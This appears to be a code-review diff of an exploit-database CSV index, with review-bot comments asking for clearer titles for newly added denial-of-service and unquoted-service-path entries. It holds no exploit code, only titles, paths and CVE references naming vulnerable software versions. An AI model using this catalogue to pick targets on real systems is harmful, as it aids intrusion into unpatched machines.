38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,,
38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,OSVDB-130627,,,,,
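Review bot: The 51102 description "SuperMailer v11.20 - Buffer overflow DoS" departs from the wording of the rows around it in three places: the "v" version prefix, lowercase "overflow" (the SuperScan rows use "Buffer Overflow"), and the abbreviation "DoS" where 14236 writes "Denial of Service". Normalise to something like "SuperMailer 11.20 - Buffer Overflow (Denial of Service)" so keyword searches stay reliable.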
@@ -38272,6 +38292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows,,2009-08-04,2017-04-01,1,OSVDB-64560;CVE-2009-4867,,,,,
9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows,,2009-09-13,,1,OSVDB-58882;CVE-2009-3574,,,,,
14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows,,2010-08-19,2010-08-19,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14689.png,http://www.exploit-db.comTuniac_Setup_100723.exe,
+51114,exploits/windows/dos/51114.c,"Tunnel Interface Driver - Denial of Service",2023-03-28,ExAllocatePool2,dos,windows,,2023-03-28,2023-03-28,0,,,,,,
11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows,,2010-01-12,2011-01-05,1,OSVDB-61671,,,http://www.exploit-db.com/screenshots/idlt11500/screen-shot-2011-01-04-at-83246-pm.png,http://www.exploit-db.comtbftpsrv1.00.712.exe,
3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows,,2007-02-19,2016-09-27,1,OSVDB-33782;CVE-2007-1080;OSVDB-33752;CVE-2007-1075;OSVDB-33751,,,,,
23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows,,2012-12-09,2012-12-09,0,CVE-2012-5451;OSVDB-88274;OSVDB-88174,,,,http://www.exploit-db.comtvmobili-windows-i386.exe,https://www.htbridge.com/advisory/HTB23120
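Review bot: The 51114 description "Tunnel Interface Driver - Denial of Service" names no vendor, driver file or version, while every neighbouring row carries at least a version or build ("Tuniac 100723", "TurboFTP Server 5.30 Build 572"). As written the row cannot be matched to an installed driver; add the driver file name and the tested version or OS build from 51114.c to the description.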
@@ -38402,6 +38423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)",2016-09-19,"Google Security Research",dos,windows,,2016-09-19,2016-09-19,1,CVE-2016-7083,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=849
42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows,,2017-06-08,2017-06-08,1,CVE-2017-4916,,,,,
44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,,2018-04-25,2018-04-25,0,,Pwn2Own,,,,https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
+51100,exploits/windows/dos/51100.txt,"VMware Workstation 15 Pro - Denial of Service",2023-03-28,"Milad karimi",dos,windows,,2023-03-28,2023-03-28,0,,,,,,
6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows,,2008-08-17,2016-12-20,1,OSVDB-48051;CVE-2008-3761,,,,,
15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows,,2010-09-25,2010-09-26,1,,,,,,
21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows,,2001-12-07,2012-09-09,1,CVE-2001-0952;OSVDB-10605,,,,,https://www.securityfocus.com/bid/3651/info
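Review bot: The 51100 title stops at "VMware Workstation 15 Pro - Denial of Service" with no component or build, where the other VMware rows in this hunk identify one ('vprintproxy.exe', 'hcmon.sys 6.0.0.45731', 'VMkbd.sys'). Name the affected component and the tested build in the description. The codes field is empty as well; if a CVE exists for this issue, reference it as 42140 does.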
@@ -39615,6 +39637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows,,1999-02-09,2012-06-16,1,CVE-1999-0372;OSVDB-11490,,,,,https://www.securityfocus.com/bid/228/info
38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,,2015-10-21,2015-10-21,0,OSVDB-129366,,,,http://www.exploit-db.comHandyPassword.exe,
50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",2021-12-06,"Mert Daş",local,windows,,2021-12-06,2021-12-06,0,,,,,,
+51105,exploits/windows/local/51105.txt,"HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows,,2015-08-07,2015-08-07,1,OSVDB-125529,"Metasploit Framework (MSF)",,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,,2015-07-29,2015-08-07,1,,,,,http://www.exploit-db.comHoMM3_HD_Latest.exe,
39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,,2016-05-16,2016-05-16,0,,,,,,
@@ -40908,6 +40931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,,2017-06-05,2018-07-20,1,CVE-2017-9355,,,http://www.exploit-db.com/screenshots/idlt42500/42119.png,http://www.exploit-db.comSubsonic.exe,
17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows,,2011-04-29,2011-04-29,1,OSVDB-72050,"Metasploit Framework (MSF)",,,http://www.exploit-db.comSubtitleProcessor771.zip,
17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows,,2011-04-27,2011-04-27,1,OSVDB-72050,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-26-at-82906-pm.png,http://www.exploit-db.comSubtitleProcessor771.zip,
+51106,exploits/windows/local/51106.txt,"SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2010-1423;CVE-2010-0886;OSVDB-63648,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb
27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows,,2013-07-23,2013-08-05,1,,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-05-at-50823-pm.png,http://www.exploit-db.comsetup_3500.exe,
13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow",2010-06-08,mr_me,local,windows,,2010-06-07,,1,,,,,,